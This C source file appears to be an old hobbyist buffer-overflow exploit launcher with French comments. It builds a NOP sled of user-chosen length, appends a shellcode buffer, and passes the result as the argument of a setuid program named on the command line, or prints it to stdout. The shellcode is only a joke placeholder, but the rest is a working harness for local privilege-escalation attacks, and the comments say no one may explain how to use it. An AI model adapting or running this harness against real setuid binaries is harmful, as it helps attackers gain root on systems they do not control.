/* yep! tested on bof.c & race.c(but not xploiting the race!:) from stylezfr!
 * 															(thx Ad & Martony)
 *
 * if you want a man, read this silly code!
 *
 * so a bofxploit easy to use, by eldre8@cyberdude.com
 *
 * placer sous GPL 2.0! (special pour Offset ;)
 * j'ai pas lu en detail, mais j'interdit (arf, c'est dur:) quiconque
 * d'expliquer a qq'un les parametres ou comment s'en servir, en gros,
 * il ne pourra servir qu'a ceux qui ont les connaissances pour s'en
 * servir et qui ont aussi les connaissances pour coder un tel code...
 * la connaissance se merite!
 */

/* TODO
 *
 * add a randomize for generating other than nop to pass through ids
 * maybe recode this thing in a better way... nop.
 * take the shellcode from a file, better than recompile, only unnecessary
 * 	if you have code a good shell code suitable for any situation (impossible)
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

void usage(char *);
void fillnop(char *, int);

int main(int argc, char *argv[]) {
    char shellcode[] = "ahah!!you\x20have%20to\ code!!!";
    char *xploit;
    int hownop;
    int r;
	FILE *finput;
	int c,p;

	if (argc<3) {
		usage(argv[0]);
		exit(-1);
    }
    hownop=atoi(argv[2]);
    xploit=malloc(sizeof(unsigned char)*hownop + sizeof(shellcode));
    if (xploit==NULL) {
		fprintf(stdout,"Can't malloc!\n");
		exit(-1);
    }
    fillnop(xploit,sizeof(unsigned char)*hownop);
    memcpy(xploit+hownop,shellcode,sizeof(shellcode));
    fprintf(stderr,"Launching the xploit on %s with %d N0P!\n",argv[1],atoi(argv[2]));
	if (!strncmp("stdout",argv[1],sizeof("stdout"))) {
		if (argc<4)
			fprintf(stderr,"no input file!\n");
		else {
			fprintf(stderr,"Reading input from %s...\n",argv[3]);
			finput=fopen(argv[3],"r");
			if (!finput)
				fprintf(stderr,"Th1s fOk$%%*µ file dozn't exist!\n");
			else {
				c=2;
				while (c>0) {
					c=fgetc(finput);
					p=fgetc(finput);
					fseek(finput,-1,SEEK_CUR);
					if ((p==-1) && (c==10)) {
						c=0;
					} else {
						fputc(c,stdout);
					}
				}
				fclose(finput);
			}
		}
		fprintf(stdout,"%s\n",xploit);
	} else {
		r=execlp(argv[1],argv[1],xploit,NULL);
		if (r<0)
			fprintf(stdout,"bad run!\n");
	}
    free(xploit);

    return(0);
}

void usage(char *prog) {
    fprintf(stdout,"Usage: %s <suid_prog> <how_nop>\n",prog);
}

void fillnop(char *xploit, int howto) {
   	int i;

   	for(i=0;i<howto;i++) {
		*(xploit+i)='\x90';
   	}
}